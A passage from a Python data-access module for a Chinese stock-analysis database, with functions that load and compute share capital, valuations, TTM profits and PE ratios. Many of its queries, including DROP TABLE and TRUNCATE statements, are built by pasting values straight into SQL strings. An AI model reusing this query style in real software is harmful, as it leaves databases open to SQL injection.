(row['ts_code'], row['date'], row['totalshares']))\n engine.execute(sql)\n else:\n return writeSQL(gubenDf, tablename)\n\n\ndef writeGuzhiToSQL(ts_code, data):\n \"\"\"下载单个股票估值数据写入数据库\"\"\"\n guzhiDict = datatrans.transGuzhiDataToDict(data)\n if guzhiDict is None:\n return True\n # print guzhiDict\n # guzhiDf = DataFrame(guzhiDict, index=[0])\n # writeSQLUpdate(guzhiDict, 'guzhi')\n # print guzhiDict\n tablename = 'guzhi'\n if 'peg' in list(guzhiDict.keys()):\n peg = guzhiDict['peg']\n else:\n peg = 'null'\n if 'next1YearPE' in list(guzhiDict.keys()):\n next1YearPE = guzhiDict['next1YearPE']\n else:\n next1YearPE = 'null'\n if 'next2YearPE' in list(guzhiDict.keys()):\n next2YearPE = guzhiDict['next2YearPE']\n else:\n next2YearPE = 'null'\n if 'next3YearPE' in list(guzhiDict.keys()):\n next3YearPE = guzhiDict['next3YearPE']\n else:\n next3YearPE = 'null'\n sql = (('replace into %(tablename)s'\n '(ts_code, peg, next1YearPE, next2YearPE, next3YearPE) '\n 'values(\"%(ts_code)s\", %(peg)s, '\n '%(next1YearPE)s, %(next2YearPE)s, '\n '%(next3YearPE)s);') % locals())\n return engine.execute(sql)\n\n\n# def writeKline(ts_code, df, insertType='IGNORE'):\n# \"\"\"股票K线历史写入数据库\"\"\"\n# tableName = tablenameKline(ts_code)\n# if not initsql.existTable(tableName):\n# initsql.createKlineTable(ts_code)\n# return writeSQL(df, tableName, insertType)\n\n\ndef lirunFileToList(ts_code, date):\n fileName = filenameLirun(ts_code)\n lirunFile = open(fileName, 'r')\n lirunData = lirunFile.readlines()\n\n dateList = lirunData[0].split()\n logging.debug(repr(dateList))\n\n try:\n index = dateList.index(date)\n logging.debug(repr(index))\n except ValueError:\n return []\n\n profitsList = lirunData[42].split()\n # if profitsList[0].decode('gbk') != '归属于母公司所有者的净利润':\n if profitsList[0] != '归属于母公司所有者的净利润':\n logging.error('lirunFileToList read %s error', ts_code)\n return []\n\n return {'ts_code': ts_code,\n 'date': date,\n 'profits': profitsList[index],\n 'reportdate': dateList[index]\n }\n\n\n# def tablenameKline(ts_code):\n# return 'kline%s' % ts_code\n\n\ndef loadChigu():\n sql = 'select ts_code from chigu;'\n result = engine.execute(sql)\n return [i[0] for i in result.fetchall()]\n\n\ndef dropTable(tableName):\n 
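# Annotation, not from the original source: tableName is interpolated directly into the SQL string,\n    # so this helper is only safe for trusted, internally generated table names (never user input).\n    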
engine.execute('DROP TABLE %s' % tableName)\n\n\ndef dropNAData():\n \"\"\" 清除K线图数据中交易量为0的数据\n \"\"\"\n # stockList = readts_codesFromSQL()\n # stockList = ['002100']\n # for ts_code in stockList:\n # tablename = tablenameKline(ts_code)\n # sql = 'delete from %(tablename)s where volume=0;' % locals()\n sql = 'delete from klinestock where volume=0;'\n engine.execute(sql)\n\n\ndef getLowPEStockList(maxPE=40):\n \"\"\"选取指定范围PE的股票\n maxPE: 最大PE\n \"\"\"\n sql = 'select ts_code, pe from stocklist where pe > 0 and pe <= %s' % maxPE\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef getAllMarketPEUpdateDate():\n \"\"\"\n 全市场PE更新日期\n :return:\n \"\"\"\n sql = 'select max(trade_date) from index_pe where ts_code=\"all\";'\n return _getLastUpdate(sql)\n\n\ndef getIndexPEUpdateDate():\n \"\"\"\n 指数PE更新日期,当前仅有上证180指数的PE值需手动计算\n :return:\n \"\"\"\n sql = f'select max(trade_date) from index_pe where ts_code=\"000010.SH\";'\n return _getLastUpdate(sql)\n\n\ndef getGuzhi(ts_code):\n sql = f'select * from guzhiresult where ts_code=\"{ts_code}\" limit 1'\n result = engine.execute(sql)\n return result.fetchone()\n\n\ndef readStockList():\n sql = 'select ts_code, name from stock_basic'\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef writeSQL(data: pd.DataFrame, tableName: str, replace=False):\n \"\"\"\n Dataframe格式数据写入tableName指定的表中\n replace: True,主键重复时更新数据, False, 忽略重复主键, 默认为False\n \"\"\"\n if data.empty:\n return True\n logging.debug('start writeSQL %s' % tableName)\n if not initsql.existTable(tableName):\n logging.error('not exist %s' % tableName)\n return False\n data = data.where(pd.notnull(data), None)\n data = datatrans.transDfToList(data)\n\n Base = declarative_base()\n\n class MyTable(Base):\n __table__ = Table(f'{tableName}', Base.metadata,\n autoload=True, autoload_with=engine)\n\n try:\n session = Session()\n metadata = MetaData(bind=engine)\n if replace:\n for d in data:\n # for index, row in data.iterrows():\n # tmpDict = row.to_dict()\n # tmpDict[data.index.name] = index\n # d = {key: getattr(row, key) for key in row.keys()}\n # for key in row.keys():\n # print('key type:', type(key))\n # print('value type:', type(getattr(row, key)))\n # print('value:', getattr(row, key))\n # table = MyTable(**tmpDict)\n table = MyTable(**d)\n session.merge(table)\n session.commit()\n else:\n mytable = Table(tableName, metadata, autoload=True)\n session.execute(mytable.insert().prefix_with('IGNORE'), data)\n session.commit()\n session.close()\n except Exception as e:\n print(e)\n print('写表失败: %s' % tableName)\n return False\n return True\n\n\ndef writets_codeListToFile(ts_codeList, filename):\n stockFile = open(filename, 'wb')\n stockFile.write(bytes('\\n').join(ts_codeList))\n stockFile.close()\n\n\ndef readGuzhiFileToDict(ts_code):\n \"\"\"\n 读取估值文件\n :rtype: dict\n :type ts_code: string\n :return dict\n \"\"\"\n guzhiFilename = filenameGuzhi(ts_code)\n guzhiFile = open(guzhiFilename)\n guzhiData = guzhiFile.read()\n guzhiFile.close()\n return datatrans.transGuzhiDataToDict(guzhiData)\n\n\ndef readGuzhiFilesToDf(stockList):\n guzhiList = []\n for ts_code in stockList:\n logging.debug('readGuzhiFilesToDf: %s', ts_code)\n guzhidata = readGuzhiFileToDict(ts_code)\n if guzhidata is not None:\n guzhiList.append(guzhidata)\n return DataFrame(guzhiList)\n\n\ndef readGuzhiSQLToDf(stockList):\n listStr = ','.join(stockList)\n sql = 'select * from guzhi where ts_code in (%s);' % listStr\n # result = engine.execute(sql)\n df = pd.read_sql(sql, engine)\n print(df)\n return df\n\n\ndef readValuationSammary():\n 
\"\"\"读取股票评分信息\"\"\"\n # 基本信息\n sql = ('select ts_code, name, date, pf, pe, peg, pe200, pe1000 '\n 'from valuation where date = (select max(date) from valuation) '\n 'order by pf desc;')\n stocks = pd.read_sql(sql, engine)\n\n # 行业名称\n sql = ('select a.ts_code, a.name, c.name as classify_name'\n ' from stock_basic a, classify_member b, classify c'\n ' where a.ts_code=b.ts_code and b.classify_code=c.code'\n ' order by ts_code;')\n hyname = pd.read_sql(sql, engine)\n stocks = pd.merge(stocks, hyname, how='left')\n\n # 财务指标\n sql = ('select a.ts_code, a.end_date as fina_date,'\n ' a.grossprofit_margin, a.roe'\n ' from fina_indicator a,'\n ' (select ts_code, max(end_date) as fina_date '\n ' from fina_indicator group by ts_code) b'\n ' where a.ts_code = b.ts_code and a.end_date = b.fina_date;')\n finastat = pd.read_sql(sql, engine)\n finastat['grossprofit_margin'] = finastat.grossprofit_margin.round(2)\n finastat['roe'] = finastat.roe.round(2)\n finastat = finastat[['ts_code', 'fina_date', 'grossprofit_margin', 'roe']]\n stocks = pd.merge(stocks, finastat, how='left')\n\n # 每日指标\n # sql = ('select a.ts_code, a.dv_ttm,'\n # ' from daily_basic a,'\n # ' (select ts_code, max(date) as daily_date'\n # ' from daily_basic group by ts_code) b'\n # ' where a.ts_code=b.ts_code and a.date = b.daily_date')\n sql = \"\"\"select a.ts_code, a.dv_ttm from daily_basic a,\n (select ts_code, max(trade_date) as daily_date \n from daily_basic group by ts_code) b\n where a.ts_code = b.ts_code and a.trade_date = b.daily_date;\"\"\"\n\n daily = pd.read_sql(sql, engine)\n stocks = pd.merge(stocks, daily, how='left')\n\n # 排序\n stocks.sort_values(by=['pf', 'pe'], ascending=(False, True), inplace=True)\n return stocks\n\n\ndef readValuation(ts_code):\n sql = (f'select * from valuation where ts_code=\"{ts_code}\"'\n 'order by date desc limit 1')\n result = engine.execute(sql).fetchone()\n return result\n\n\n# def downloadKline(ts_code, startDate=None, endDate=None):\n# if startDate is None: # startDate为空时取股票最后更新日期\n# startDate = getKlineUpdateDate(ts_code)\n# startDate = startDate.strftime('%Y-%m-%d')\n# if endDate is None:\n# endDate = dt.datetime.today().strftime('%Y-%m-%d')\n# return downloadKlineTuShare(ts_code, startDate, endDate)\n#\n#\n# def downloadKlineTuShare(ts_code,\n# startDate='1990-01-01', endDate='2099-12-31'):\n# try:\n# histDf = ts.get_hist_data(ts_code, startDate, endDate)\n# except IOError:\n# return None\n# return histDf\n\n\ndef readLirunList(date):\n sql = 'select * from lirun where `date` >= %s and `date` <= %s' % (\n str(date - 10), str(date))\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef readPERate(ts_code):\n \"\"\" 读取一只股票的PE历史水平,\n # 返回PE200, PE1000两个数值,分别代表该股票当前PE值在过去200、1000个交易日中的水平\n \"\"\"\n sql = (f'select round(pe200, 2) pe200, round(pe1000, 2) pe1000'\n f' from guzhiresult where ts_code=\"{ts_code}\" limit 1')\n print(sql)\n # 指定日期(含)前无TTM利润数据的,查询起始日期设定为startDate\n # 否则设定为最近一次数据日期\n result = engine.execute(sql).fetchone()\n if result is None:\n return None, None\n else:\n return result\n\n\ndef readTTMProfits(ts_code: str, startDate=None, endDate=None):\n \"\"\"取指定股票一段日间的TTM利润,startDate当日无数据时,取之前最近一次数据\n Parameters\n --------\n ts_code: str 股票代码 e.g: '600519'\n startDate: date 起始日期 e.g: '1990-01-01'\n endDate: date 截止日期 e.g: '1990-01-01'\n\n Return\n --------\n DataFrame: 返回DataFrame格式TTM利润\n \"\"\"\n # 指定日期(含)前最近一次利润变动日期\n if startDate is None:\n return\n startDateStr = startDate.strftime('%Y-%m-%d')\n sql = ('select max(reportdate) from ttmlirun '\n 'where 
ts_code=\"%(ts_code)s\" '\n 'and reportdate<=\"%(startDateStr)s\"' % locals())\n # print sql\n # 指定日期(含)前无TTM利润数据的,查询起始日期设定为startDate\n # 否则设定为最近一次数据日期\n result = engine.execute(sql).fetchone()\n if result[0] is None:\n TTMLirunStartDate = startDateStr\n else:\n TTMLirunStartDate = result[0]\n sql = ('select * from ttmlirun where ts_code = \"%(ts_code)s\" '\n 'and `reportdate` >= \"%(TTMLirunStartDate)s\" '\n 'order by date' % locals())\n # print sql\n if endDate is not None:\n sql += ' and `date` <= \"%s\"' % endDate.strftime('%Y-%m-%d')\n df = pd.read_sql(sql, engine)\n\n # 指定日期(含)前存在股本变动数据的,重设第1次变动日期为startDate,\n # 减少更新Kline表中总市值所需计算量\n if TTMLirunStartDate != startDateStr:\n df.loc[df.reportdate == TTMLirunStartDate, 'reportdate'] = startDate\n return df\n\n\ndef readLastTTMProfit(ts_code, limit=1, date=None):\n \"\"\"取指定股票最近几期TTM利润\n Parameters\n --------\n ts_code: str 股票代码 e.g: '600519.SH'\n date: str 查询截止日期, e.g: '20191231'\n limit: 取最近期数的数据\n\n Return\n --------\n list: 返回list格式TTM利润\n \"\"\"\n sql = f'select incrate from ttmprofits where ts_code=\"{ts_code}\" '\n if date is not None:\n sql += f' and reportdate<=\"{date}\"'\n sql += f' order by date desc limit {limit}'\n # print sql\n result = engine.execute(sql).fetchall()\n result = [i[0] for i in reversed(result)]\n return result\n\n\ndef readLastTTMProfits(stockList, limit=1, date=None):\n \"\"\"取股票列表最近几期TTM利润\n Parameters\n --------\n :param stockList: str 股票代码 e.g: ['600519.SH', '002518.SZ']\n :param limit: 取最近期数的数据\n :param date:\n\n Return\n --------\n DataFrame: 返回DataFrame格式TTM利润\n \"\"\"\n TTMLirunList = []\n for ts_code in stockList:\n TTMLirun = readLastTTMProfit(ts_code, limit, date)\n TTMLirun.insert(0, ts_code)\n TTMLirunList.append(TTMLirun)\n\n # print TTMLirunList\n columns = ['incrate%s' % i for i in range(limit)]\n columns.insert(0, 'ts_code')\n TTMLirunDf = DataFrame(TTMLirunList, columns=columns)\n return TTMLirunDf\n\n\ndef readTTMProfitsForDate(date):\n \"\"\"从TTMLirun表读取某季度股票TTM利润\n date: 格式YYYYQ, 4位年+1位季度,利润所属日期\n return: 返回DataFrame格式TTM利润\n \"\"\"\n sql = ('select * from ttmlirun where '\n '`date` = \"%(date)s\"' % locals())\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef readLirunForDate(date):\n \"\"\"从Lirun表读取一期股票利润\n date: 格式YYYYQ, 4位年+1位季度,利润所属日期\n return: 返回DataFrame格式利润\n \"\"\"\n sql = ('select * from lirun where '\n '`date` = \"%(date)s\"' % locals())\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef readTTMPE(ts_code):\n \"\"\" 读取某支股票的全部TTMPE\n \"\"\"\n sql = ('select date, ttmpe from klinestock where ts_code=\"%(ts_code)s\";'\n % locals())\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef readLastTTMPE(ts_code, date=None):\n \"\"\"读取指定股票指定日期的TTMPE,默认为最后一天的TTMPE\n\n :param ts_code: str\n 股票代码, 如'600013'\n :param date: str\n 指定日期, 格式'YYYYmmdd'\n :return:\n \"\"\"\n sql = (f'select pe_ttm from daily_basic where ts_code=\"{ts_code}\" '\n f'and trade_date=(select max(`trade_date`) from daily_basic where '\n f'ts_code=\"{ts_code}\"')\n if date is None:\n sql += ')'\n else:\n sql += f' and trade_date<={date})'\n\n result = engine.execute(sql).fetchone()\n if result is None:\n return None\n else:\n return result[0]\n\n\ndef readCal(startDate=None, endDate=None, exchange='SSE', is_open=1):\n sql = (f'select cal_date trade_date from trade_cal'\n f' where exchange=\"{exchange}\"')\n if startDate is not None:\n sql += f' and cal_date>=\"{startDate}\"'\n if endDate is not None:\n sql += f' and cal_date<=\"{endDate}\"'\n sql += f' and is_open={is_open}'\n result = 
engine.execute(sql).fetchall()\n    return [d[0].strftime('%Y%m%d') for d in result]\n\n\ndef readLastTTMPEs(stockList, trade_date=None):\n    \"\"\"\n    读取stockList中股票指定日期的TTMPE, 默认取最后一天的TTMPE\n    :param stockList: list\n        股票列表\n    :param trade_date: str\n        'YYYYmmdd'格式的日期\n    :return:\n    \"\"\"\n    sql = 'select ts_code, pe_ttm pe from daily_basic where trade_date='\n    if trade_date is None:\n        sql += '(select max(trade_date) from daily_basic)'\n    else:\n        sql += f'\"{trade_date}\"'\n\n    result = engine.execute(sql).fetchall()\n    if not result:\n        logging.warning(f'缺少{trade_date}每日指标')\n        return None\n    df = pd.read_sql(sql, engine)\n    # ts_codes, ttmpes = zip(*result)\n    # df = pd.DataFrame({'ts_code': ts_codes, 'pe': ttmpes})\n    df = df.loc[df['ts_code'].isin(stockList)]\n    df = df.dropna()\n    return df\n\n\n# def alterKline():\n#     sql = 'show tables like %s'\n#     result = engine.execute(sql, 'kline%')\n#     result = result.fetchall()\n#\n#     for i in result:\n#         tablename = i[0]\n#         sql = 'call stockdata.alterkline(%s)'\n#         try:\n#             engine.execute(sql, tablename)\n#             # result = result.fetchall()\n#             print(tablename)\n#         except sqlalchemy.exc.OperationalError as e:\n#             print(e)\n#     return\n\n\ndef calAllTTMLirun(date, incrementUpdate=True):\n    \"\"\"计算全部股票本期TTM利润并写入TTMLirun表\n    date: 格式YYYYQ, 4位年+1位季度\n    incrementUpdate: True, 增量更新, False, 覆盖已有数据的更新方式\n    # 计算公式: TTM利润 = 本期利润 + 上年第四季度利润 - 上年同期利润\n    # 计算原理:TTM利润为之前连续四个季度利润之和\n    # 本期利润包含今年以来产生所有利润,上年第四季度利润 减上年同期利润为上年同期后一个季度至年末利润\n    # 两者相加即为TTM利润\n    # 举例:2016年1季度TTM利润 = 2016年1季度利润 + 2015年4季度利润 - 2015年1季度利润\n    # 数据完整的情况下等同于:\n    # 2015年2季度利润 + 2015年3季度利润 + 2015年4季度利润 + 2016年1季度利润\n    # 当本期为第4季度时,计算公式仍有效, 如:\n    # 2016年4季度TTM利润 = 2016年4季度利润 + 2015年4季度利润 - 2015年4季度利润\n    # 但为提高效率,当本期为第4季度时,TTM利润=本期利润, 直接返回利润数据\n    \"\"\"\n    lirunCur = readLirunForDate(date)\n    if (date % 10) == 4:\n        TTMLirun = lirunCur.copy()\n        TTMLirun.columns = ['ts_code', 'date', 'ttmprofits', 'reportdate']\n        # return writeSQL(TTMLirun, 'ttmlirun')\n    else:\n        if incrementUpdate:\n            TTMLirunCur = readTTMProfitsForDate(date)\n            lirunCur = lirunCur[~lirunCur.ts_code.isin(TTMLirunCur.ts_code)]\n\n        # 上年第四季度利润, 仅取利润字段并更名为profits1\n        lastYearEnd = (date // 10 - 1) * 10 + 4\n        lirunLastYearEnd = readLirunForDate(lastYearEnd)\n        print(('lirunLastYearEnd.head():', lirunLastYearEnd.head()))\n        lirunLastYearEnd = lirunLastYearEnd[['ts_code', 'profits']]\n        lirunLastYearEnd.columns = ['ts_code', 'profits1']\n\n        # 上年同期利润, 仅取利润字段并更名为profits2\n        lastYearQuarter = date - 10\n        lirunLastQarter = readLirunForDate(lastYearQuarter)\n        lirunLastQarter = lirunLastQarter[['ts_code', 'profits']]\n        lirunLastQarter.columns = ['ts_code', 'profits2']\n\n        # 整合以上三个季度利润,ts_code为整合键\n        TTMLirun = pd.merge(lirunCur, lirunLastYearEnd, on='ts_code')\n        TTMLirun = pd.merge(TTMLirun, lirunLastQarter, on='ts_code')\n\n        TTMLirun['ttmprofits'] = (TTMLirun.profits +\n                                  TTMLirun.profits1 - TTMLirun.profits2)\n        TTMLirun = TTMLirun[['ts_code', 'date', 'ttmprofits', 'reportdate']]\n        print('TTMLirun.head():\\n', TTMLirun.head())\n\n    # 写入ttmlirun表后,重算TTM利润增长率\n    if incrementUpdate:\n        writeSQL(TTMLirun, 'ttmlirun')\n    else:\n        replaceTTMLinrun(TTMLirun)\n\n    return calTTMLirunIncRate(date)\n\n\ndef replaceTTMLinrun(df):\n    \"\"\"\n    以替换方式更新TTM利润,用于批量修正TTM利润表错误\n    :param df:\n    :return:\n    \"\"\"\n    for index, row in df.iterrows():\n        # print(row['ts_code'])\n        ts_code = row['ts_code']\n        _date = row['date']\n        ttmprofits = row['ttmprofits']\n        reportdate = row['reportdate']\n        sql = ('replace into ttmlirun(ts_code, date, ttmprofits, reportdate) '\n               'values(\"%(ts_code)s\", %(_date)s, '\n               '%(ttmprofits)s, 
\"%(reportdate)s\");' % locals())\n print(sql)\n engine.execute(sql)\n\n\ndef calTTMLirunIncRate(date, incrementUpdate=True):\n \"\"\"计算全部股票本期TTM利润增长率并写入TTMLirun表\n date: 格式YYYYQ, 4位年+1位季度\n # 计算公式: TTM利润增长率= (本期TTM利润 - 上年同期TTM利润) / TTM利润 * 100\n \"\"\"\n TTMLirunCur = readTTMProfitsForDate(date)\n if incrementUpdate:\n TTMLirunCur = TTMLirunCur[TTMLirunCur.incrate.isnull()]\n TTMLirunLastYear = readTTMProfitsForDate(date - 10)\n TTMLirunLastYear = TTMLirunLastYear[['ts_code', 'ttmprofits']]\n TTMLirunLastYear.columns = ['ts_code', 'ttmprofits1']\n TTMLirunLastYear = TTMLirunLastYear[TTMLirunLastYear.ttmprofits1 != 0]\n\n # 整合以上2个表,ts_code为整合键\n TTMLirunCur = pd.merge(TTMLirunCur, TTMLirunLastYear, on='ts_code')\n\n TTMLirunCur['incrate'] = ((TTMLirunCur.ttmprofits -\n TTMLirunCur.ttmprofits1) /\n abs(TTMLirunCur.ttmprofits1) * 100)\n for i in TTMLirunCur.values:\n ts_code = i[0]\n incRate = round(i[4], 2)\n sql = ('update ttmlirun '\n 'set incrate = %(incRate)s'\n ' where ts_code = \"%(ts_code)s\"'\n 'and `date` = %(date)s' % locals())\n engine.execute(sql)\n return\n\n\ndef calTTMLirun(stockdf, date):\n lirun1 = stockdf[stockdf.date == date - 10] # 上年同期利润\n lirun2 = stockdf[stockdf.date == (date / 10 - 1) * 10 + 4] # 上年末利润\n lirun3 = stockdf[stockdf.date == date] # 本期利润\n if lirun1.empty or lirun2.empty or lirun3.empty:\n return None\n lirun1 = lirun1.iat[0, 2]\n lirun2 = lirun2.iat[0, 2]\n ts_code = lirun3.iat[0, 0]\n reportdate = lirun3.iat[0, 3]\n lirun3 = lirun3.iat[0, 2]\n # TTM利润 = 本期利润+上年末利润-上年同期利润\n lirun = lirun3 + lirun2 - lirun1\n return [ts_code, date, lirun, reportdate]\n\n\ndef getLirunUpdateEndQuarter():\n curQuarter = datatrans.transDateToQuarter(dt.datetime.now())\n return datatrans.quarterSub(curQuarter, 1)\n\n\ndef _getLastUpdate(sql):\n \"\"\"\n Parameters\n --------\n sql: str 指定查询更新日期的SQL语句\n e.g: 'select ttmpe from lastupdate where ts_code=\"002796\"'\n\n Return\n --------\n datetime:datetime\n \"\"\"\n result = engine.execute(sql).first()\n if result is None:\n return dt.datetime.strptime('1990-01-01', '%Y-%m-%d').date()\n\n lastUpdateDate = result[0]\n if lastUpdateDate is None:\n return dt.datetime.strptime('1990-01-01', '%Y-%m-%d').date()\n\n # lastUpdateDate = lastUpdateDate[0]\n if isinstance(lastUpdateDate, dt.date):\n return lastUpdateDate\n # return lastUpdateDate + dt.timedelta(days=1)\n else:\n logging.debug('lastUpdateDate type is: %s', type(lastUpdateDate))\n return dt.datetime.strptime(lastUpdateDate, '%Y-%m-%d').date()\n\n\ndef writeChigu(stockList):\n engine.execute('TRUNCATE TABLE chigu')\n for ts_code in stockList:\n sql = ('insert into chigu (`ts_code`) '\n 'values (\"%s\");') % ts_code\n engine.execute(sql)\n\n\n# def savePELirunIncrease(startDate='2007-01-01', endDate=None):\n# stockList = readStockListFromSQL()\n# for ts_code, stockName_ in stockList:\n# # sql = (u'insert ignore into pelirunincrease(ts_code, date, pe) '\n# # u'select \"%(ts_code)s\", date, ttmpe '\n# # u'from klinestock%(ts_code)s '\n# # u'where `date`>=\"%(startDate)s\";') % locals()\n# #\n# # engine.execute(sql)\n#\n# TTMLirunDf = readTTMProfits(ts_code, startDate)\n# TTMLirunDf = TTMLirunDf.dropna().reset_index(drop=True)\n# klineTablename = 'klinestock'\n# TTMLirunCount = len(TTMLirunDf)\n# for i in range(TTMLirunCount):\n# incrate = TTMLirunDf['incrate'].iloc[i]\n# startDate_ = TTMLirunDf['reportdate'].iloc[i]\n# try:\n# endDate_ = TTMLirunDf['reportdate'].iloc[i + 1]\n# except IndexError:\n# endDate_ = None\n#\n# sql = ('update pelirunincrease '\n# 'set lirunincrease = 
%(incrate)s'\n# ' where ts_code=\"%(ts_code)s\"'\n# ' and date>=\"%(startDate_)s\"') % locals()\n# if endDate_ is not None:\n# sql += (' and date<\"%(endDate_)s\"' % locals())\n# engine.execute(sql)\n#\n#\n# # break\n\n\n# def setKlineTTMPELastUpdate(ts_code, endDate):\n# sql = ('insert into lastupdate (`ts_code`, `ttmpe`) '\n# 'values (\"%(ts_code)s\", \"%(endDate)s\") '\n# 'on duplicate key update `ttmpe`=\"%(endDate)s\";' % locals())\n# result = engine.execute(sql)\n# return result\n\n\ndef setGubenLastUpdate(ts_code, endDate=None):\n sql = ('insert into lastupdate (`ts_code`, `guben`) '\n 'values (\"%(ts_code)s\", \"%(endDate)s\") '\n 'on duplicate key update `guben`=\"%(endDate)s\";' % locals())\n result = engine.execute(sql)\n return result\n\n\ndef del_updateKlineTTMPE(ts_code, startDate, endDate=None):\n \"\"\"\n # 更新Kline表TTMPE\n \"\"\"\n # engine = getEngine()\n if startDate is None:\n return\n\n startDateStr = startDate.strftime('%Y-%m-%d')\n klineTablename = 'klinestock'\n sql = ('update %(klineTablename)s '\n 'set ttmpe = round(totalmarketvalue / ttmprofits, 2)'\n ' where ts_code=\"%(ts_code)s\" and date>=\"%(startDateStr)s\"'\n % locals())\n if endDate:\n sql += ' and date < \"%s\"' % endDate\n sql += ' and totalmarketvalue is not null'\n sql += ' and ttmprofits is not null'\n unusedResult = engine.execute(sql)\n sql = f'select max(date) from klinestock where ts_code=\"{ts_code}\"'\n result = engine.execute(sql)\n endDate = result.fetchone()[0]\n if endDate is not None:\n endDate = endDate.strftime('%Y-%m-%d')\n else:\n endDate = (dt.datetime.today() - dt.timedelta(days=1))\n endDate = endDate.strftime('%Y-%m-%d')\n return endDate\n\n\ndef readGuben(ts_code, startDate=None, endDate=None):\n \"\"\"取指定股票一段日间的股本变动数据,startDate当日无数据时,取之前最近一次变动数据\n Parameters\n --------\n ts_code: str 股票代码 e.g: '600519'\n startDate: str 起始日期 e.g: '1990-01-01'\n endDate: str 截止日期 e.g: '1990-01-01'\n\n Return\n --------\n DataFrame\n date: 股本变动日期\n totalshares: 变动后总股本\n \"\"\"\n # 指定日期(含)前最近一次股本变动日期\n if startDate is None:\n return\n startDateStr = startDate.strftime('%Y-%m-%d')\n sql = ('select max(date) from guben '\n 'where ts_code=\"%(ts_code)s\" '\n 'and date<=\"%(startDateStr)s\"' % locals())\n result = engine.execute(sql)\n lastUpdate = result.fetchone()[0]\n\n # 指定日期(含)前无股本变动数据的,查询起始日期设定为startDate\n # 否则设定为最近一次变动日期\n if lastUpdate is None:\n gubenStartDate = startDateStr\n else:\n gubenStartDate = lastUpdate.strftime('%Y-%m-%d')\n\n sql = ('select date, totalshares from guben '\n 'where ts_code = \"%(ts_code)s\"'\n ' and `date`>=\"%(gubenStartDate)s\"' % locals())\n if endDate:\n sql += ' and `date` <= \"%s\"' % endDate.strftime('%Y-%m-%d')\n df = pd.read_sql(sql, engine)\n\n # 指定日期(含)前存在股本变动数据的,重设第1次变动日期为startDate,\n # 减少更新Kline表中总市值所需计算量\n if lastUpdate is not None:\n gbdate = datetime.strptime(gubenStartDate, '%Y-%m-%d').date()\n df.loc[df['date'] == gbdate, 'date'] = startDateStr\n return df\n\n\ndef readGubenUpdateList():\n \"\"\" 比较股票已存股本数据与最新股数据,不相同时则表示需要更新的股票\n \"\"\"\n sql = 'select ts_code, totals as totalsnew from stocklist;'\n dfNew = pd.read_sql(sql, engine)\n\n # dfNew = ts.get_stock_basics()\n # dfNew = dfNew.reset_index()\n # dfNew = dfNew[['code', 'totals']]\n # dfNew.columns = ['ts_code', 'totalsnew']\n sql = ('SELECT ts_code, totalshares as totalsold '\n 'FROM (select * from stockdata.guben order by date desc) '\n 'as tablea group by ts_code;')\n dfOld = pd.read_sql(sql, engine)\n dfOld.totalsold = dfOld.totalsold / 100000000\n dfOld = dfOld.round(2)\n updateList = 
pd.merge(dfNew, dfOld, on='ts_code', how='left')\n updateList.fillna({'totalsold': 0}, inplace=True)\n updateList = updateList[abs(\n updateList.totalsnew - updateList.totalsold) > 0.1]\n return updateList.ts_code\n\n\ndef readClose(ts_code):\n sql = ('select date, close from klinestock where ts_code=\"%(ts_code)s\";'\n % locals())\n df = pd.read_sql(sql, engine)\n return df\n\n\ndef readCurrentClose(ts_code):\n sql = (f'select close from daily where ts_code=\"{ts_code}\" '\n f' and trade_date=(select max(`trade_date`)'\n f' from daily where ts_code=\"{ts_code}\")')\n result = engine.execute(sql)\n return result.fetchone()[0]\n\n\ndef readCurrentPEG(ts_code):\n sql = 'select peg from guzhiresult where ts_code=\"%s\" limit 1' % ts_code\n logging.info(sql)\n result = engine.execute(sql)\n try:\n result = result.fetchone()[0]\n except TypeError:\n return None\n else:\n return result\n\n\ndef getts_codesForClassified(classified):\n sql = ('select ts_code from classified '\n 'where cname = \"%(classified)s\"' % locals())\n result = engine.execute(sql)\n ts_codeList = [classifiedID[0] for classifiedID in result.fetchall()]\n return ts_codeList\n\n\ndef classifiedToSQL(classifiedDf):\n \"\"\" 旧版写行业分类到数据库, 计划删除本函数\n \"\"\"\n tablename = 'classified'\n return writeSQL(classifiedDf, tablename)\n\n\ndef getChiguList():\n # sql = ('select chigu.ts_code, stocklist.name from chigu, stocklist '\n # 'where chigu.ts_code=stocklist.ts_code')\n sql = 'select ts_code from chigu'\n result = engine.execute(sql)\n return [ts_code[0] for ts_code in result.fetchall()]\n\n\ndef getGuzhiList():\n # sql = ('select guzhiresult.ts_code, stocklist.name '\n # 'from guzhiresult, stocklist '\n # 'where guzhiresult.ts_code=stocklist.ts_code')\n sql = 'select ts_code from youzhiguzhi'\n result = engine.execute(sql)\n return [ts_code[0] for ts_code in result.fetchall()]\n\n\n# return result.fetchall()\n\n\ndef getYouzhiList():\n # sql = ('select youzhiguzhi.ts_code, stocklist.name '\n # 'from youzhiguzhi, stocklist '\n # 'where youzhiguzhi.ts_code=stocklist.ts_code')\n # sql = 'select ts_code from guzhiresult'\n sql = 'select ts_code from youzhiguzhi'\n result = engine.execute(sql)\n return [ts_code[0] for ts_code in result.fetchall()]\n\n\ndef getClassifiedForStocksID(ts_code):\n sql = ('select cname from classified '\n 'where ts_code = \"%(ts_code)s\"' % ts_code)\n result = engine.execute(sql)\n classified = result.first()[0]\n return classified\n\n\ndef getStockName(ts_code):\n sql = f'select name from stock_basic where ts_code=\"{ts_code}\";'\n result = engine.execute(sql).first()\n if result is not None:\n return result[0]\n else:\n return None\n\n\ndef readStockKline(ts_code, startDate=None, endDate=None, days=0):\n \"\"\"\n 读取股票K线数据\n :param endDate:\n :param startDate:\n :param ts_code: str, 6位股票代码\n :param days: int, 读取的天数\n :return: Dataframe\n klineDf = pd.DataFrame({'date': dateList,\n 'open': openList,\n 'close': closeList,\n 'high': highList,\n 'low': lowList,\n 'pe': peList})\n \"\"\"\n sql = (f'select a.trade_date, a.open, a.high, a.low, a.close, b.pe_ttm'\n f' from daily a, daily_basic b where a.ts_code=\"{ts_code}\" ')\n if startDate is not None:\n sql += f' and a.trade_date>=\"{startDate}\"'\n if endDate is not None:\n sql += f' and a.trade_date<=\"{endDate}\"'\n sql += f' and a.ts_code=b.ts_code and a.trade_date=b.trade_date'\n if days != 0:\n sql += f' order by a.trade_date desc limit {days}'\n return _readKline(sql)\n\n\ndef readProfitsIncAdf():\n stocks = 
